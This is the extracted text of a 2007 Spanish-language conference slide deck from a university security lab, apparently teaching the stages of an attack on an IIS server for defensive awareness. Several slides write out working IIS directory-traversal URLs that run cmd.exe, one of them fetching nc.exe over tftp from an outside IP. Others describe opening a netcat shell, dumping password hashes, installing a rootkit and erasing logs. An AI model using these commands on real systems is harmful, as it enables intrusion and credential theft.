90
La Praxis del Cracker Miguel Torrealba S. ([email protected]) Universidad Simón Bolívar Venezuela

La Praxis del Cracker Miguel Torrealba S. ([email protected]) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

Embed Size (px)

Citation preview

Page 1: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

La Praxis del Cracker

Miguel Torrealba S.([email protected])

Universidad Simón Bolívar

Venezuela

LACNIC X - Marzo 2007 - Margarita

Page 2: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

Laboratorio de Seguridad en Tecnología de la Información

USBGISTI

Page 3: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

“La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas”.

Simson Garfinkel y Eugene Spafford (1999)

Page 4: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 5: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Footprinting

(Hallar el Rastro)

La Praxis del Cracker – MTS – Margarita 2007

Page 6: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 7: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 8: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 9: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 10: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 11: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 12: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 13: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Scanning

(Exploración)

La Praxis del Cracker – MTS – Margarita 2007

Page 14: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 15: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 16: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 17: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 18: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 19: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 20: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

http://jeremias.nul.usb.ve

- La salida ya provee un indicio del “servidor web” que se está ejecutando y del puerto que está atendiendo las peticiones

- Empleando otras herramientas como “nmap” de Fyodor, que identifican el sistema operativo usando “TCP Stack Fingerprinting” se puede obtener una información más confiable

La Praxis del Cracker – MTS – Margarita 2007

Page 21: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 22: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 23: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Enumeration

(Enumeración)

La Praxis del Cracker – MTS – Margarita 2007

Page 24: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 25: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 26: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 27: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 28: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 29: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 30: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 31: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 32: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 33: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 34: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 35: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 36: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Gainning Access

(Ganar Acceso)

La Praxis del Cracker – MTS – Margarita 2007

Page 37: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\

- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima.

- Para lograr eso solo requiere ejecutar el comando “dir” de la consola de comandos a través del servidor web

La Praxis del Cracker – MTS – Margarita 2007

Page 38: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\- ..%255c.. = ..(%25)5c.. = ..%5c .. = ..(%5c).. = .. \ ..http://jeremias.nul.usb.ve/scripts/..\../..\../winnt/system32/cmd.exe?c+dir+c:\

- Estructura lógica del disco de Jeremias:

C: \ Inetpub \ scripts \

Winnt \ system32 \

La Praxis del Cracker – MTS – Margarita 2007

Page 39: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 40: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 41: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 42: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 43: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 44: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 45: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 46: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+c:\winnt/system32/tftp.exe+-i+159.90.31.161+get+nc.exe

- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima.

La Praxis del Cracker – MTS – Margarita 2007

Page 47: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 48: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 49: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 50: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\Inetpub\scripts

- Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa.

La Praxis del Cracker – MTS – Margarita 2007

Page 51: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 52: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Hora de transferir un “exploit”- “Httpodbc.dll” es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad “Decode” del IIS 4.0 y 5.0

- Para el “servidor web” del sistema de la víctima este programa parecerá un “código script” que ha sido colocado para que los usuarios finales lo ejecuten

La Praxis del Cracker – MTS – Margarita 2007

Page 53: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 54: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 55: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 56: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 57: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 58: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 59: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 60: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del “servidor web” IIS 4.0 o 5.0

La Praxis del Cracker – MTS – Margarita 2007

Page 61: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Escalating Privilege

(Escalar Privilegios)

La Praxis del Cracker – MTS – Margarita 2007

Page 62: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 63: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Con esta orden se procede a ejecutar “NETCAT” la “navaja del ejército suizo” de “Hackers” de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima

• Un “nuevo” servicio de comandos queda escuchando desde ese instante

La Praxis del Cracker – MTS – Margarita 2007

Page 64: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 65: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 66: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 67: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 68: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Desde una consola de comandos local –el atacante- ejecuta ahora un “telnet” al puerto 7001 del sistema de la víctima

• La idea es disponer de un “login remoto” que permita ejecutar comandos en el sistema víctima

• Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un “terminal virtual en la red”

La Praxis del Cracker – MTS – Margarita 2007

Page 69: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 70: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Con el Telnet se ha establecido una conexión TCP a la consola de comandos que “escucha” peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica

• Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio “transparente”

• Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local

La Praxis del Cracker – MTS – Margarita 2007

Page 71: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 72: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 73: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 74: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 75: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Pilfering

(Ratería, Vileza, Bajeza, Ruindad)

La Praxis del Cracker – MTS – Margarita 2007

Page 76: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo “Crackeador”

La Praxis del Cracker – MTS – Margarita 2007

Page 77: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema

La Praxis del Cracker – MTS – Margarita 2007

Page 78: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Creating Backdoors

(Crear las Puertas Traseras)

La Praxis del Cracker – MTS – Margarita 2007

Page 79: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Ahora el Cracker puede “sembrar” calquier programa tipo “backdoor” que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad “Decode” del IIS 4.0 y 5.0 es subsanada

La Praxis del Cracker – MTS – Margarita 2007

Page 80: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 81: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 82: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Rootkit HD 1.0 – versión de evaluación -

- Opera en sistemas WNT/W2K/WXP

- Parecido a un “troyano”, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta

- Genera un nuevo servicio “Hacker Defender 100” sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente “bdclient”

- Puede adaptar su funcionamiento para disponer de distintas formas de operación

- Provee facilidad de contraseña para controlar su ejecución

La Praxis del Cracker – MTS – Margarita 2007

Page 83: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

Covering Tracks

(Cubrir las Huellas)

La Praxis del Cracker – MTS – Margarita 2007

Page 84: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Finalmente, si se han transferido programas para alterar los “logs”, el Cracker puede borrar fácilmente toda “huella” de su actividad. En caso contrario puede hacerlo manualmente

La Praxis del Cracker – MTS – Margarita 2007

Page 85: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 86: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 87: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 88: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

La Praxis del Cracker – MTS – Margarita 2007

Page 89: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

MÉTODO GENÉRICO DE ATAQUE

• Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo

La Praxis del Cracker – MTS – Margarita 2007

Page 90: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

_________________________________CIERRE

“Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro”.

Sun Tzu

El Arte de la Guerra

La Praxis del Cracker – MTS – Margarita 2007